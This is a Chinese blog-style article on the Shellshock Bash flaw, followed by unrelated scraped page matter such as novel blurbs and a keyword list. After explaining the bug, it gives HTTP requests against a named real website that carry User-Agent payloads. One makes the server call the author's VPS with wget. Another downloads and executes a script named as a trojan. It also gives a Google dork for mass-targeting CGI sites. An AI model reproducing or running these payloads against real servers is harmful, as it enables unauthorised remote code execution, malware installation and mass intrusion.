命令执行漏洞

从昨天开始,这个从澳大利亚远渡重洋而来的BASH远程命令执行漏洞就沸腾了整个FreeBuf家都在谈论,“互联网的心脏又出血了”,可是,亲,到底怎么对网站进行测试?下面这段脚本
$ env x=‘() { :;}; echo vulnerable bash -c "echo this is a test"

真的如各路大神们说的这样吗?
它与“心脏出血”漏洞不同,“心脏出血”只能借助窃取用户电脑信息,而bash 漏洞允许黑客远程控制电脑,拿到系统最高权限!其方法利用就更简单了——复制/粘贴一行命令代码即可!

Bash漏洞为什么能够执行

Bash漏洞的原理:
BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量!当前版本的bash通过以函数名作为环境变量名,以“(){”开头的字串作为环境变量的值来将函数定义导出为环境变量。
此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令。

简单地说就是,Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令。
Bash漏洞与远程执行有啥联系
看到上面的解释,很多童鞋都理解成了本地的漏洞,然后很多人又觉得,本地有啥可以利用的,于是就忽略了这个神级漏洞的存在。我想说的是,这个漏洞,利用热度可以媲美当年的MS08-067,威力虽然弱了点,但远程控制电脑还是可以的。
首先解释一下cgi脚本。很多网站类似下面的链接:
GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1

后台不仅仅用python、Perl来解释执行并反馈给客户端Response,当然还可以换做bash脚本来解释执行提交上来的GET/POST请求。所以,理论上,你在HTTP请求中插入一个Bash命令,比如
() { :;}; wget http://www.myvps.org/testvul.sh

如果服务器的Bash解释器具有这个漏洞,那么在解释上面这这句话的时候就会执行wget请求,将一个恶意的testvul.sh文件下载到这个服务器,那为何说要放在HTTP头部呢?比如:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

这是因为这个漏洞是bash解释器在解释某些特殊的变量时才可以触发的:
在于BASH处理以“(){”开头的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令
通过自定义这些参数的值为“函数环境变量”的形式,就可以触发后面的命令,恶意的客户仅需要发送特殊构造的HTTP请求就可以使服务器执行特定的命令(命令的权限和解释HTTP请求的Bash脚本环境相同)。
实际测试中,我的构造的测试请求:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

过程是这样的:
我发送GET请求–>目标服务器cgi路径
目标服务器解析这个get请求,碰到UserAgent后面的参数,Bash解释器就执行了后面的命令
目标服务器wget–>我的myvps.org
我的vps记录下这个访问的IP地址
然后查看我的myvps.org服务器的访问记录,就可以确定目标有没有去访问,如果访问了,那么,很好,它是有漏洞的。下面是我的VPS接收到的wget请求访问的日志:

大神是这样测试漏洞的

当然,你也可以这样构造:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

实际上执行了下面三句:
/usr/bin/wget -O /tmp/muma.sh http://myvps.org/muma.sh ;
chmod 777 /tmp/muma.sh;
./tmp/muma.sh

你会发现,脚本就执行了,这就是Bash漏洞利用测试的精髓。
当然,你可以利用批量Google搜索:
filetype:cgi inurl:cgi-bin site:jp
然后批量提交类似的GET请求,你就能做到批量测试了。测试表明,500个url里有6-8个有bash漏洞可以在腾讯智慧安全页面申请使用腾讯御点
然后使用这个软件上面的修复漏洞功能
直接对电脑的漏洞进行检测和修复就可以了
喜欢阅读
  • 黑夜里的她

    黑夜里的她

    她是大名鼎鼎的冷血杀手,在执行第100个任务后莫名消失于江湖。5年后,她带着一个机灵娃娃再度重出江湖。目的只有一个,那就是救出被囚禁的父母;“妈咪,他跟小琪一样帅,他就是小琪的爹地吧?”“死小子,别随便是个人你就叫爹地!”阴错阳差,她与一邪魅的神秘男人结识,却不知自己已经陷入了一场游戏之中。“女人,想要完成任务么?那就把你自己献给我!”“哼,我南宫凌薇想要的东西,还需要付出?”不屑男人的交易,她精心设计了一场意外,却在这意外下,发现了一个隐藏5年的惊天秘密……,

  • 山君:你家娘子掉了

    山君:你家娘子掉了

    墨鋆是一块青黑色的石头,而他则是掌管一方的山君。他给了她修炼成人的机会,让她知晓情为何物,也让她知道了心碎是什么感觉。历尽波折,她终于等到了他的深情告白,可……

  • 冷妃不倾心

    冷妃不倾心

    现代冷血女杀手穿越古代,凤逆九天。他是倾国倾城的五皇子,冷淡出尘,却对她一见倾心。她冰冷如洁,视他为仇敌,却奇妙的救了他。宫廷的尔虞我诈,爱恨情仇。

  • 无上修真医仙

    无上修真医仙

    痛踩高富帅,逆杀宗派弟子,医治各种高人。少年林超,从小习得一身医术,后又得奇遇成为修真者,成就无上医仙。

  • 等待千年:吸血鬼王的新娘

    等待千年:吸血鬼王的新娘

    一个周而复始的梦,如同一道无形的枷锁束缚着她。千年的等待,只为挚爱的人能够重新回到他的身边,同样的梦不同的心,自她出生伊始,命运的巨轮便开始转动,连在她与他之间的羁绊再次开始收缩。当白色的蔷薇花瓣,一片一片凋零……当两个人的心越来越近,才发现。原来,吸血鬼也可以是那么的温柔……当尖锐的獠牙穿透她的颈项,当温柔被嗜血替代,她才发现。一切不过是梦幻泡影。

  • 猎艳神香

    猎艳神香

    在这片古老的大陆上有一个伟人说道:“妻不如妾,妾不如偷。”他只想偷得众多的美人心,偷了嫩的再偷熟的,偷了身边的再偷别人的。没想到偷盗最后却让他偷得一个偌大的天下。云飞扬的经历会让你懂得什么叫做白手起家,什么叫做王侯将相宁有种乎。

  • 前夫先生别想复婚

    前夫先生别想复婚

    结婚之前,阮溪就知道陆景琰心里有人,但她还是义无反顾的嫁了。不为别的,只因他也是她心里的人。后来有一天,陆景琰的心上人重回他的怀抱,阮溪以为有了孩子终于能稳固的婚姻,在他们惊天地泣鬼神的狗血爱情面前,轰然倒塌。她义无反顾地选择了离婚。爱了这么多年,赔上了青春赔上了心,还给人家生了个孩子,不能再连尊严也没了。离婚后的阮溪对陆景琰爱理不理,一言不合就开怼。每每见面,陆景琰总是被她气得半死。他抗议她这般粗鲁地对他,她冷冷地笑,“陆景琰,你怎么能要求一个失婚妇女脾气好呢?她这样就已经很不错了。”可是,他怎么越来越喜欢她了呢?甚至想跟她,重修旧好破镜重圆?

  • 萌宝来袭,总裁爹地靠边站

    萌宝来袭,总裁爹地靠边站

    五年前被人陷害,逼迫出国。五年后带着天才萌娃强势归来。霍权骁看着面前和自己长得一模一样,又偷偷从自己卡上划钱的小鬼头就有些气闷,“从我卡上划走一亿要干什么?”某宝眨眨眼:“给妈咪买衣服”霍权骁:“.......买衣服一个亿怎么够?这是我的全部家产,拿去,给你妈咪用!”

  • 猜你喜欢
    热门推荐
  • help manual 中文版
  • flex 不自动换行
  • 上海市蒙自路25号
  • 厄运之王漫画全集
  • 《秦思传》by imeros
  • x509certificate2使用
  • 上海车抵押贷款
  • nodejs 代码提示
  • ghastly dj
  • swift 底部弹出框
  • htc rhyme s510b刷机包
  • 隐漫画在墙里立体排插
  • 神牛tt685s与tt350s
  • 配置pyrouge
  • 柳州柳东新区招聘
  • 苹果公司logo
  • 祁同伟第几集死的
  • 广州飞天画室老师
  • 中国象棋大师v2006
  • the.emoji.movie 字幕
  • All Right Reserved 资料库